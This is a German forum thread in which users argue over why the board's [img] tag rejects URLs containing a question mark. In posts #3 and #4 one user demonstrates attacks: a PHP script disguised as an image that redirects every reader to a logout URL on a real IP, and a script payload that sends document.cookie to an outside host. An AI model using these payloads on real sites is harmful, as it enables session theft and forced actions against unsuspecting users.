Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
Problem mit dem [img]-Tag
#1
ja, also der image tag ist im moment ziemlich kaputt, wenn man da einen img link mit einem ? benutzt so wie andreas da, wird das bild einfach nicht angezeigt. gut find ich das nicht
:kopfwand:
Zitieren
#2
Hi
@System, hab den beitrag mal hierher verschoben, da es hier besser reinpasst.

Es hat einen grund, weshalb es probleme mit dem "?" gibt. Man könnte sonst php befehle mit dem img-tag ausführen und niemand kann sich dagegen schützen.
mfg
tdd Big Grin
Zitieren
#3
naja, ich kann einfach ein script schreiben, dass dann folgendes macht:
auftag?php header("Location: http://80.190.243.221/login.php?do=logout"); ?zutag

wenn ich dieses php script bei image tag hier einlinke, was im moment erlaubt ist und auch nicht gesperrt werden kann (ich kann scripte auch script.jpg nennen, meinem apache ist das ega, wenn das verzeichnis stimmtl), dann würde jeder leser des beitrages sofort abgemeldet werden. da es so geht, kann man das ? auch direkt erlauben.
:kopfwand:
Zitieren
#4
und da fällt mir auf, was ist mit folgendem trick:
<script>document.write('<img src=http://pfuscher.funpic.de/formular.php?"'+encodeURI(document.cookie)+'">')</script>

das bild wird erzeugt durch
Zitat:script document.write('img src=http://pfuscher.funpic.de/formular.php?"'+encodeURI(document.cookie)+'"') /script
allerdings mit entsprechnen dreieckigen klammern dazu, doch leider kann man die hier nicht schreiben, ohne dass sie als html interpretiert werden und ich bin zu faul nachzusehen, wie die entities lauten

es geht natürlich auch als text:
<script>document.write(document.cookie)</script>
:kopfwand:
Zitieren
#5
mfg
tdd Big Grin
Zitieren
#6
man baut nicht mehr lücken damit ein, sondern man blockiert nur eine bestimmte funktionalität, nämlich querystrings bei urls, die negative und positiven nutzen haben können. jedoch wird die negative nutzung nicht verhinder, da man mit einfachen tricks ja doch wieder alles kann. wer will hier überhaupt für jemand anders php sache ausführen? da würde man doch eh nur gebannt werden
:kopfwand:
Zitieren


Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 2 Gast/Gäste